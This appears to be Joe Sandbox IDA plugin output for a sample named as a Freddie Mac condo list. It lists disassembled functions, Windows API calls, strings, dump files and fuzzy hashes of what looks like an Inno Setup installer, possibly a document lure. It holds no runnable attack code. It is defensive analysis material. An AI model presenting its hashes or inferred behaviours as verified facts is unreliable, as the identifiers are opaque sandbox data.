Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 254331816-221126205
Opcode ID: 2609ea7e346f2b00e944a6579133f7cd7ad2ab1e7388d4ed423ae0c2cc39ebae
Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
Opcode Fuzzy Hash: 2609ea7e346f2b00e944a6579133f7cd7ad2ab1e7388d4ed423ae0c2cc39ebae
Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265

Strings

\, xrefs: 0040E232
kernel32.dll, xrefs: 0040E0EC
GetLongPathNameW, xrefs: 0040E0FC

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 1930782624-3908791685
Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89

Uniqueness

Uniqueness Score: -1.00%

Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744

Strings

SeShutdownPrivilege, xrefs: 0060F700

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B

Uniqueness

Uniqueness Score: -1.00%

Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 006A6913
GetWindowLongW.USER32(?,000000F0), ref: 006A6930
GetWindowLongW.USER32(?,000000EC), ref: 006A6955

Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29

GetActiveWindow.USER32 ref: 006A6A34
SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,?,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87

Strings

`, xrefs: 006A68E9

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$ActiveLong$EnableIconic
String ID: `
API String ID: 4222481217-2679148245
Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE

Strings

isRS-, xrefs: 006B8E55
isRS-???.tmp, xrefs: 006B8E1D

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
Opcode Fuzzy Hash: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 005C90F9
GetWindowLongW.USER32(?,000000F0), ref: 005C9116
GetWindowLongW.USER32(?,000000EC), ref: 005C913B
GetActiveWindow.USER32 ref: 005C9149
MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$ActiveLong$IconicMessage
String ID:
API String ID: 1633107849-0
Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0062CFB8, Relevance: 3.1, APIs: 2, Instructions: 52comCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateInstanceVersion
String ID:
API String ID: 1462612201-0
Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15

Uniqueness

Uniqueness Score: -1.00%

Function 005C8B3C, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59

Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DescriptorSecurity$CreateDaclInitializeMutex
String ID:
API String ID: 3525989157-0
Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A

Uniqueness

Uniqueness Score: -1.00%

Function 006B9138, Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 260COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
MsgWaitForMultipleObjects.USER32 ref: 006B9206
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B

Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5

Strings

.lst, xrefs: 006B9258
.msg, xrefs: 006B923E
Inno-Setup-RegSvr-Mutex, xrefs: 006B91C9
(\m, xrefs: 006B928F
Setup, xrefs: 006B91AA
/REG, xrefs: 006B916E
/REGU, xrefs: 006B9192
<`m, xrefs: 006B927E

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ShowWindow$FileModuleMultipleNameObjectsWait
String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 66301061-906243933
Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00625D4B
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
GetExitCodeProcess.KERNEL32 ref: 00625D86
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9

Strings

Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
Helper process exited., xrefs: 00625D95
Helper process exited, but failed to get exit code., xrefs: 00625DBF
Helper isn't responding; killing it., xrefs: 00625D57
Helper process exited with failure code: 0x%x, xrefs: 00625DB3

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: 8d6c89499cf1bf81312fa230767d1d7ef722e42560ff29e95753671f007f5a00
Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
Opcode Fuzzy Hash: 8d6c89499cf1bf81312fa230767d1d7ef722e42560ff29e95753671f007f5a00
Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A

Uniqueness

Uniqueness Score: -1.00%

Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
SetWindowLongW.USER32 ref: 006B74F0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
MsgWaitForMultipleObjects.USER32 ref: 006B7599
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7

Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996

DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD

Strings

STATIC, xrefs: 006B74D6
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 006B7554
(\m, xrefs: 006B7498

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 1779715363-1630723103
Opcode ID: 26cf6587e7bf8b1553ca1d5cbf9fdcd1103d68e801311e3200c35554a7ed760e
Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
Opcode Fuzzy Hash: 26cf6587e7bf8b1553ca1d5cbf9fdcd1103d68e801311e3200c35554a7ed760e
Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64

Uniqueness

Uniqueness Score: -1.00%

Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
MsgWaitForMultipleObjects.USER32 ref: 006260D7
GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

CreateEvent, xrefs: 0062602F
TransactNamedPipe, xrefs: 00626097

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
